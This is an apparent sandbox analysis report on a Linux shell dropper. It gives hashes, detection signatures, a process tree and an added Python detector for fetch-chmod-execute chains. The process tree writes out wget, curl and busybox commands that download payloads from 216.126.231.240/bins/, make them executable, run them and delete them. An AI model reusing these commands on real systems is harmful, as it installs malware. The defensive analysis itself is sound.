Analysis

max time kernel: 69s
max time network: 74s
platform: debian-9_armhf
resource: debian9-armhf-20240611-en
resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 24/11/2024, 02:02

Tasks

Static task: static1
Behavioral task: behavioral1, sample 0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh, resource ubuntu1804-amd64-20240729-en
Behavioral task: behavioral2, sample 0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh, resource debian9-armhf-20240611-en
Behavioral task: behavioral3, sample 0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh, resource debian9-mipsbe-20240418-en
Behavioral task: behavioral4, sample 0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh, resource debian9-mipsel-20240611-en

The platform and resource above match behavioral2, so the signatures and process tree on this page are from the debian9-armhf run; the amd64, mipsbe and mipsel runs are not shown here.
General

Target: 0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh
Size: 10KB
MD5: 90e40b4503b0424a058f69437e1026ff
SHA1: 035df066045d7bc2ab807fc923f25cf1a0f3e70e
SHA256: 0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474
SHA512: adfa914962ae7273bfd9238ce16c5b177765452a64ba873335cc42fdab6cf5cf072fb12803403aa10b44c957efbc5e2a76de724c912bde8c573afee70a1a1795
SSDEEP: 192:8zddR70qV5mSi1dGxvSgM3omSi1de72gdR70qVa:8zddR70kHxvSgM3S72gdR70ka
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Process: chmod, 28 invocations, PIDs 691, 699, 711, 727, 745, 765, 776, 788, 806, 826, 835, 841, 847, 853, 859, 867, 873, 879, 885, 891, 899, 905, 911, 917, 923, 931, 937, 943
Every hit is a `chmod 777 <payload>` run by the dropper script on a file it has just fetched into /tmp (see Processes); the chmod is immediately followed by execution of that file, which is the pairing worth alerting on rather than the chmod alone.
Executes dropped EXE 28 IoCs
Each of the 14 dropped files is executed twice (once in each download pass of the Processes section):

ioc                                        pid (first run)  pid (second run)
/tmp/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH    693              912
/tmp/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw4    700              918
/tmp/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ    712              924
/tmp/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd    728              932
/tmp/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ    746              938
/tmp/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p    766              944
/tmp/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS    777              874
/tmp/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj    789              880
/tmp/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr    807              886
/tmp/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ    828              860
/tmp/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc    836              868
/tmp/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k9    842              892
/tmp/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD7    848              900
/tmp/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo    854              906
Checks CPU configuration 1 TTPs 28 IoCs
Checks CPU information which indicates if the system is a virtual machine.
File opened for reading: /proc/cpuinfo, by curl, 28 times (once per curl invocation).
Every hit is attributed to curl itself, never to the dropped payloads. A user-space tool reading /proc/cpuinfo at start-up is ordinary CPU-feature probing, so on this page the signature says nothing about anti-analysis behaviour in the payloads.
Reads runtime system information 56 IoCs
File opened for reading: /proc/self/auxv, by curl, 28 times.
File opened for reading: /proc/sys/crypto/fips_enabled, by curl, 28 times.
This block has no heading in the extracted page; the label is the one the process tree attaches to every curl invocation, and the counts match one read of each file per curl. As with /proc/cpuinfo, these are curl's own start-up reads (the process's ELF auxiliary vector and the kernel's FIPS-mode flag), not payload behaviour.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
File opened for modification by curl, each of the following 14 paths twice (matching the two download passes in the Processes section):

/tmp/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH
/tmp/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw4
/tmp/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ
/tmp/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd
/tmp/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ
/tmp/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p
/tmp/9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS
/tmp/eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj
/tmp/vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr
/tmp/1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ
/tmp/uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc
/tmp/mWwCaRsytB63gfA94vvOgnOFNzJkghO4k9
/tmp/0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD7
/tmp/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo

Only curl is credited with writing these files; the wget and busybox wget invocations for the same URLs have no file-write hit on this page.
Processes

Root sample and its first child:

  PID 660  depth 1  image /tmp/0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh
                    command /tmp/0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh
  PID 667  depth 2  image /bin/rm
                    command /bin/rm bins.sh

Every remaining process is a depth-2 child of PID 660 and belongs to one of 28 identical fetch-and-run cycles. The script tries all three fetch tools in sequence for every payload, then makes the file executable, runs it and deletes it. For a payload NAME the cycle is, in this order:

  /usr/bin/wget   wget http://216.126.231.240/bins/NAME
  /usr/bin/curl   curl -O http://216.126.231.240/bins/NAME
                  signatures: Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  /bin/busybox    /bin/busybox wget http://216.126.231.240/bins/NAME
  /bin/chmod      chmod 777 NAME
                  signature: File and Directory Permissions Modification
  /tmp/NAME       ./NAME
                  signature: Executes dropped EXE
  /bin/rm         rm NAME

PIDs per cycle. The 14 payload names are each fetched and run twice; cycles 15 to 28 repeat the names of cycles 1 to 14 in a different order.

  cycle  NAME                                wget  curl  busybox  chmod  exec  rm
  1      j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH   669   677   686      691    693   694
  2      9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw4   695   697   698      699    700   701
  3      Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ   702   703   708      711    712   713
  4      bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd   714   718   723      727    728   729
  5      glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ   730   735   742      745    746   747
  6      qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p   749   754   762      765    766   767
  7      9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS   769   773   775      776    777   778
  8      eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj   779   780   785      788    789   791
  9      vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr   792   796   801      806    807   808
  10     1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ   809   813   821      826    828   829
  11     uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc   830   833   834      835    836   837
  12     mWwCaRsytB63gfA94vvOgnOFNzJkghO4k9   838   839   840      841    842   843
  13     0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD7   844   845   846      847    848   849
  14     NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo   850   851   852      853    854   855
  15     1VdTpFDfYEoYTdETaR6mg8z1kBiyM07qIQ   856   857   858      859    860   861
  16     uc9pd8sKJnb6RcT9HQhqd1rvGbtTQbWuFc   862   865   866      867    868   869
  17     9i37lS00ZcT60ZzngDoQnSOlP5kF2JyRKS   870   871   872      873    874   875
  18     eGnHbtRh4cAaTBKtKNGB6upNcprFM83YRj   876   877   878      879    880   881
  19     vYpYcRc8ocImQGjbiQz1yx3BW2Jw2soEBr   882   883   884      885    886   887
  20     mWwCaRsytB63gfA94vvOgnOFNzJkghO4k9   888   889   890      891    892   893
  21     0bxuV6xkq5avoDNTOgD9L9kJm5X1DgwLD7   894   895   898      899    900   901
  22     NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo   902   903   904      905    906   907
  23     j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH   908   909   910      911    912   913
  24     9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw4   914   915   916      917    918   919
  25     Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ   920   921   922      923    924   925
  26     bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd   926   927   930      931    932   933
  27     glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ   934   935   936      937    938   939
  28     qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p   940   941   942      943    944   945
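The detection logic behind the Signatures section above (the chmod-then-execute chain the report labels "File and Directory Permissions Modification" and "Executes dropped EXE") and the IoCs a responder would carry away from the Processes section, as an added example. This is not code from the report, from the sandbox, or from the sample. The event records are constructed from the PIDs and command lines on this page (the root script, `rm bins.sh`, and the first two cycles); their shape, and the parent PID of the root, are assumptions. It generalizes past the page's `chmod 777`: `grants_exec` accepts any octal or symbolic mode that adds an execute bit.

```python
"""Replay the report's process tree as an event stream and run the two
detections its signatures describe. Added example, not part of the report;
EVENTS is constructed from the page and its record shape is an assumption."""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Exec:
    pid: int
    ppid: int
    image: str
    cmdline: str


C2_BASE = "http://216.126.231.240/bins/"
ROOT = "/tmp/0e9185d71a11c447bd73d73b6ab74e01defe4da33df4380158862e3af88f4474.sh"


def cycle(name, wget, curl, busybox, chmod, run, rm, parent=660):
    """The six depth-2 children the report shows for one payload NAME."""
    url = C2_BASE + name
    return [
        Exec(wget, parent, "/usr/bin/wget", f"wget {url}"),
        Exec(curl, parent, "/usr/bin/curl", f"curl -O {url}"),
        Exec(busybox, parent, "/bin/busybox", f"/bin/busybox wget {url}"),
        Exec(chmod, parent, "/bin/chmod", f"chmod 777 {name}"),
        Exec(run, parent, f"/tmp/{name}", f"./{name}"),
        Exec(rm, parent, "/bin/rm", f"rm {name}"),
    ]


# Constructed from the Processes section: the submitted script (its parent PID
# is not on the page; 1 is assumed), "rm bins.sh", and cycles 1 and 2.
EVENTS = (
    [Exec(660, 1, ROOT, ROOT), Exec(667, 660, "/bin/rm", "/bin/rm bins.sh")]
    + cycle("j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH", 669, 677, 686, 691, 693, 694)
    + cycle("9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw4", 695, 697, 698, 699, 700, 701)
)

URL_RE = re.compile(r"https?://[^\s'\"<>]+")
CHMOD_RE = re.compile(r"^chmod\s+(?:-[a-zA-Z]+\s+)*(\S+)\s+(\S+)$")
FETCHERS = {"wget", "curl", "busybox"}


def basename(path: str) -> str:
    return path.rsplit("/", 1)[-1]


def grants_exec(mode: str) -> bool:
    """True if a chmod mode adds an execute bit: an odd octal digit in the last
    three positions (777, 755, 4755) or a symbolic +x / =x (u+x, a=rx)."""
    if mode.isdigit():
        return any(int(d) & 1 for d in mode[-3:])
    return re.search(r"[+=][rwst]*x", mode) is not None


def find_drop_exec_chains(events):
    """One record per file that is fetched from a URL, made executable with
    chmod and then run from /tmp by the same parent, plus whether that parent
    deleted it afterwards (the dropper's full fetch/chmod/exec/rm cycle)."""
    fetched = defaultdict(set)   # (ppid, file) -> fetch tools that tried it
    armed = {}                   # (ppid, file) -> pid of the chmod that made it +x
    chains = []
    for ev in events:
        tool = basename(ev.image)
        url = URL_RE.search(ev.cmdline)
        if tool in FETCHERS and url:
            fetched[(ev.ppid, basename(url.group()))].add(tool)
            continue
        cm = CHMOD_RE.match(ev.cmdline)
        if tool == "chmod" and cm and grants_exec(cm.group(1)):
            armed[(ev.ppid, basename(cm.group(2)))] = ev.pid
            continue
        key = (ev.ppid, tool)
        if ev.image.startswith("/tmp/") and key in armed:
            chains.append({"payload": tool, "parent": ev.ppid,
                           "fetched_with": sorted(fetched.get(key, ())),
                           "chmod_pid": armed.pop(key), "exec_pid": ev.pid,
                           "deleted": False})
            continue
        if tool == "rm":   # self-cleanup: rm of a payload this parent just ran
            target = basename(ev.cmdline.split()[-1])
            for chain in reversed(chains):
                if chain["parent"] == ev.ppid and chain["payload"] == target:
                    chain["deleted"] = True
                    break
    return chains


def extract_iocs(events):
    """Download URLs, the hosts behind them, and executables dropped under /tmp
    (events[0] is the submitted sample itself and is excluded)."""
    urls = sorted({m.group() for ev in events for m in URL_RE.finditer(ev.cmdline)})
    hosts = sorted({re.match(r"https?://([^/]+)", u).group(1) for u in urls})
    dropped = sorted({ev.image for ev in events[1:] if ev.image.startswith("/tmp/")})
    return {"urls": urls, "hosts": hosts, "dropped_files": dropped}


if __name__ == "__main__":
    for chain in find_drop_exec_chains(EVENTS):
        print(chain)
    print(extract_iocs(EVENTS))
```

To run this over real telemetry, map each execve record from auditd, an eBPF tracer or an EDR export onto `Exec(pid, ppid, image, cmdline)` in observation order; keying on the parent PID is what separates a dropper's own chmod/exec pair from an unrelated `chmod +x` elsewhere on the host.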
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 153B
MD5: 998368d7c95ea4293237f2320546e440
SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

No file name or source URL is attached to this entry, and at 153 bytes it is far too small to be a working bot binary. None of the 14 payloads executed in the Processes section appears here and the Network section is empty, so this page does not establish whether 216.126.231.240 served real payloads during the run; the hashes above are the only download artefact it records.